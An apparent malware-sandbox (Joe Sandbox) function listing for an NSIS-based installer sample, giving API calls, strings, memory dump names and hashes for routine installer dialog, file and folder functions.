Instruction ID: 3d4d3d9973c8e241304b7258fdbe4eb8662a2ffc95f0db4602c58cf82c677d54
Opcode Fuzzy Hash: ac0908efb29991f9f7612423f5cb2e6f0edb2ee2ffb265e7f658777761b029f9
Instruction Fuzzy Hash: 74A16A71900608BFDB119FA4DE89AAE7B79FB48355F00403AFA44B61A0CB754E51DF68

Function 00404BD4 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404BEB
GetDlgItem.USER32(?,00000408), ref: 00404BF8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404C47
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C5E
SetWindowLongA.USER32(?,000000FC,004051DC), ref: 00404C78
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C8A
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C9E
SendMessageA.USER32(?,00001109,00000002), ref: 00404CB4
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CC0
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CD0
DeleteObject.GDI32(00000110), ref: 00404CD5
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D00
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D0C
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DA6
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DD6

Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DEA
GetWindowLongA.USER32(?,000000F0), ref: 00404E18
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404E26
ShowWindow.USER32(?,00000005), ref: 00404E36
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F31
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F96
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FAB
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FCF
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404FEF
ImageList_Destroy.COMCTL32(?), ref: 00405004
GlobalFree.KERNEL32(?), ref: 00405014
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040508D
SendMessageA.USER32(?,00001102,?,?), ref: 00405136
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405145
InvalidateRect.USER32(?,00000000,00000001), ref: 00405165
ShowWindow.USER32(?,00000000), ref: 004051B3
GetDlgItem.USER32(?,000003FE), ref: 004051BE
ShowWindow.USER32(00000000), ref: 004051C5

Strings

N, xrefs: 00404E6F
, xrefs: 0040519D
M, xrefs: 00404D8E

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8f5a1c4aa5113f352fc46f697d9e306d8de9479be2c67950049f22cbc462bb38
Instruction ID: e03921bd6c6e4a37bdfb411e954e05a497c968e6c467d94503d0be5cca2fcafc
Opcode Fuzzy Hash: 8f5a1c4aa5113f352fc46f697d9e306d8de9479be2c67950049f22cbc462bb38
Instruction Fuzzy Hash: 7E024CB0A00209AFDF209F94DD45AAE7BB5FB84354F10813AF610BA2E1D7799D42DF58

Function 00403CFB Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D37
ShowWindow.USER32(?), ref: 00403D54
DestroyWindow.USER32 ref: 00403D68
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D84
GetDlgItem.USER32(?,?), ref: 00403DA5
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DB9
IsWindowEnabled.USER32(00000000), ref: 00403DC0
GetDlgItem.USER32(?,00000001), ref: 00403E6E
GetDlgItem.USER32(?,00000002), ref: 00403E78
SetClassLongA.USER32(?,000000F2,?), ref: 00403E92
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403EE3
GetDlgItem.USER32(?,00000003), ref: 00403F89
ShowWindow.USER32(00000000,?), ref: 00403FAA
EnableWindow.USER32(?,?), ref: 00403FBC
EnableWindow.USER32(?,?), ref: 00403FD7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FED
EnableMenuItem.USER32(00000000), ref: 00403FF4
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040400C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040401F
lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00404049
SetWindowTextA.USER32(?,00420D30), ref: 00404058
ShowWindow.USER32(?,0000000A), ref: 0040418C

Strings

0B, xrefs: 00404039

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: 0B
API String ID: 184305955-4132856435
Opcode ID: ab6da0646cfc314af1bada8ded2489a09d542cdefb29361912f124bcb7d64920
Instruction ID: 7396c87bec48d1de0b65d229f3995359e9ede5a691df1363d58f31033cac92c3
Opcode Fuzzy Hash: ab6da0646cfc314af1bada8ded2489a09d542cdefb29361912f124bcb7d64920
Instruction Fuzzy Hash: B3C122B1600301EBCB216F61ED89E2B3AB8FB85306F51053EF651B51F1CB7999829B1D

Function 0040395E Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506

lstrcatA.KERNEL32(0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410,0042B400,0042A000,00000000), ref: 004039D9
lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410), ref: 00403A4E
lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
GetFileAttributesA.KERNEL32(004236C0), ref: 00403A6C
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403AB5

Part of subcall function 0040609F: wsprintfA.USER32 ref: 004060AC

RegisterClassA.USER32(00423EC0), ref: 00403AF2
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B0A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B3F
ShowWindow.USER32(00000005,00000000), ref: 00403B75
GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403BA1
GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403BAE
RegisterClassA.USER32(00423EC0), ref: 00403BB7
DialogBoxParamA.USER32(?,00000000,00403CFB,00000000), ref: 00403BD6

Strings

.exe, xrefs: 00403A5B
RichEdit, xrefs: 00403BA8
RichEdit20A, xrefs: 00403B99, 00403B9F
_Nb, xrefs: 00403AD1, 00403B39
RichEd20, xrefs: 00403B7B
.DEFAULT\Control Panel\International, xrefs: 004039C4
0B, xrefs: 0040398A
Control Panel\Desktop\ResourceLocale, xrefs: 00403992
RichEd32, xrefs: 00403B89

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$0B$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-610843794
Opcode ID: 85ceac433090de6822b423d9ce6217ac409b436af6a9068422674f926c817ff9
Instruction ID: b29c60b9e4819681180a0682236be2a56282820a6c44356677c11e3a39c8f367
Opcode Fuzzy Hash: 85ceac433090de6822b423d9ce6217ac409b436af6a9068422674f926c817ff9
Instruction Fuzzy Hash: 0961D8707406046ED620AF65AD45F273EACDB8574AF40043FF951B22E2CB7D9D068A3D

Function 0040433A Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043C5
GetDlgItem.USER32(00000000,000003E8), ref: 004043D9
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043F7
GetSysColor.USER32(?), ref: 00404408
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404417
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404426
lstrlenA.KERNEL32(?), ref: 00404429
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404438
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040444D
GetDlgItem.USER32(?,0000040A), ref: 004044AF
SendMessageA.USER32(00000000), ref: 004044B2
GetDlgItem.USER32(?,000003E8), ref: 004044DD
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040451D
LoadCursorA.USER32(00000000,00007F02), ref: 0040452C
SetCursor.USER32(00000000), ref: 00404535
LoadCursorA.USER32(00000000,00007F00), ref: 0040454B
SetCursor.USER32(00000000), ref: 0040454E
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040457A
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040458E

Strings

N, xrefs: 004044CB

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
Instruction ID: 25b6b162fa7d48e4e961d9928df0462ddf83e59e31dd5b95d6ec5816e65db8cb
Opcode Fuzzy Hash: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
Instruction Fuzzy Hash: 6E6182B1A00209BBDF109F61DD45B6A7B69FF84710F10813AFB15BA1D1C7B8A951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
Instruction ID: 2cfb6452d3ed2adb0490a6fda74b90e1dfbf7fcab0fd01839bab840ee2ffb3d6
Opcode Fuzzy Hash: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
Instruction Fuzzy Hash: 07418D71400209AFCB058F95DE459AF7BB9FF45315F00802EF5A1AA1A0C7349955DFA4

Function 00404661 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004046B0
SetWindowTextA.USER32(00000000,?), ref: 004046DA
SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040478B
CoTaskMemFree.OLE32(00000000), ref: 00404796
lstrcmpiA.KERNEL32(004236C0,00420D30), ref: 004047C8
lstrcatA.KERNEL32(?,004236C0), ref: 004047D4
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004047E6

Part of subcall function 00405841: GetDlgItemTextA.USER32(?,?,00000400,0040481D), ref: 00405854

Part of subcall function 004063AB: CharNextA.USER32(?,*?|<>/":,00000000,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406403
Part of subcall function 004063AB: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
Part of subcall function 004063AB: CharNextA.USER32(?,0042A000,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406415
Part of subcall function 004063AB: CharPrevA.USER32(?,?,74DF3410,0042B400,00000000,0040335F,0042B400,0042B400,00403596,?,00000006,00000008,0000000A), ref: 00406425

GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 004048A4
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048BF

Part of subcall function 00404A18: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
Part of subcall function 00404A18: wsprintfA.USER32 ref: 00404ABE
Part of subcall function 00404A18: SetDlgItemTextA.USER32(?,00420D30), ref: 00404AD1

Strings

A, xrefs: 00404784
0B, xrefs: 0040475E

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: 0B$A
API String ID: 2624150263-373579336
Opcode ID: ee346185362cf3791e06a9f3fa2f25786f97bfbeb7d2d70098bc45d35eaf17e7
Instruction ID: 834555d72061076239680e6a84f3316086c58123263e9301e374821f8ce8aa56
Opcode Fuzzy Hash: ee346185362cf3791e06a9f3fa2f25786f97bfbeb7d2d70098bc45d35eaf17e7
Instruction Fuzzy Hash: 5FA150F1900209ABDB11AFA5CD85AAFB7B8EF84314F10843BF611B62D1D77C99418B6D

Function 00405DB0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F41,?,?), ref: 00405DE1
GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405DEA

Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81

GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405E07
wsprintfA.USER32 ref: 00405E25
GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405E60
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E6F
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA7
SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405EFD
GlobalFree.KERNEL32(00000000), ref: 00405F0E
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F15

Part of subcall function 00405CDA: GetFileAttributesA.KERNEL32(00000003,00402E57,0042BC00,80000000,00000003), ref: 00405CDE
Part of subcall function 00405CDA: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00

Strings

[Rename], xrefs: 00405E8F, 00405EA1
%s=%s, xrefs: 00405E1B

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: ea34b8269daeb14a3879d28dfee10c2595801ce7354f6ad27735141817cde965
Instruction ID: 443431a376db42b7d779c0f12c1ecf66d6c3f5619bcb6008fb44dfcbbf8babb0
Opcode Fuzzy Hash: ea34b8269daeb14a3879d28dfee10c2595801ce7354f6ad27735141817cde965
Instruction Fuzzy Hash: B5312631204B15BBD2207B65AE49F6B3A5CDF81714F14043BF942F62D2DA7CD9028ABD

Function 00402E14 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402E28
GetModuleFileNameA.KERNEL32(00000000,0042BC00,00000400), ref: 00402E44

Part of subcall function 00405CDA: GetFileAttributesA.KERNEL32(00000003,00402E57,0042BC00,80000000,00000003), ref: 00405CDE
Part of subcall function 00405CDA: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,0042AC00,0042AC00,0042BC00,0042BC00,80000000,00000003), ref: 00402E8D
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402FCF

Strings

Inst, xrefs: 00402EF9
soft, xrefs: 00402F02
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403018
Error launching installer, xrefs: 00402E64
Null, xrefs: 00402F0B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403066

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3016655952
Opcode ID: b8ae4ea4567667b822b1a028ef7342e4c5664cf843c5f151ac0204ae6ee5b6ea
Instruction ID: 15cfe338c172b2f14672f474af97282dc626767e8c2a942c813fbe846372f848
Opcode Fuzzy Hash: b8ae4ea4567667b822b1a028ef7342e4c5664cf843c5f151ac0204ae6ee5b6ea
Instruction Fuzzy Hash: C271B271A00208ABDB20EF74ED89BAE7BB8EB44355F51403BE910B62D1D77C9E418B5C

Function 00406163 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(004236C0,00000400), ref: 0040628E
GetWindowsDirectoryA.KERNEL32(004236C0,00000400,?,00420510,00000000,004052A0,00420510,00000000), ref: 004062A1
SHGetSpecialFolderLocation.SHELL32(004052A0,00000000,?,00420510,00000000,004052A0,00420510,00000000), ref: 004062DD
SHGetPathFromIDListA.SHELL32(00000000,004236C0), ref: 004062EB
CoTaskMemFree.OLE32(00000000), ref: 004062F7
lstrcatA.KERNEL32(004236C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631B
lstrlenA.KERNEL32(004236C0,?,00420510,00000000,004052A0,00420510,00000000,00000000,00000000,00000000), ref: 0040636D

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040625D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406315

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: 55d0e0849926790f3b2beeac2145b556fefee7c74e7047295da2d752dda0aa13
Instruction ID: 216e8927814ca7a9437579cdf690648b6b4dd304440a75ce87bcc4b513c9caea
Opcode Fuzzy Hash: 55d0e0849926790f3b2beeac2145b556fefee7c74e7047295da2d752dda0aa13
Instruction Fuzzy Hash: B661F431900215AEDF209F24D8917BE3BA4AB46314F52413FED53B62D1C73C4966CB8E

Function 00404236 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404253
GetSysColor.USER32(00000000), ref: 00404291
SetTextColor.GDI32(?,00000000), ref: 0040429D
SetBkMode.GDI32(?,?), ref: 004042A9
GetSysColor.USER32(?), ref: 004042BC
SetBkColor.GDI32(?,?), ref: 004042CC
DeleteObject.GDI32(?), ref: 004042E6
CreateBrushIndirect.GDI32(?), ref: 004042F0

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction ID: 8c367e47b4306476cf29da68a02135d76106e82033ebf96affcab25eba3a867f
Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction Fuzzy Hash: 362195716007049BCB319F68D948B5BBBF8AF41750B04897EFE96A26E0C734D944CB64

Function 00405268 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 2d50aaf80812c9820dc98849908b30421a007c8f928f616371a5a969bb93c1b7
Instruction ID: 33e4e25cccf7abea72a497d718f2df9cdca22d62bd402c63bdf8694765fb3fc0
Opcode Fuzzy Hash: 2d50aaf80812c9820dc98849908b30421a007c8f928f616371a5a969bb93c1b7
Instruction Fuzzy Hash: 7A219A71900508BACB119FA5DD81A9EBFB9EF04354F00807AF944B6291C7B98A80CFA8

Function 00402D75 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D8D
GetTickCount.KERNEL32 ref: 00402DAB
wsprintfA.USER32 ref: 00402DD9

Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
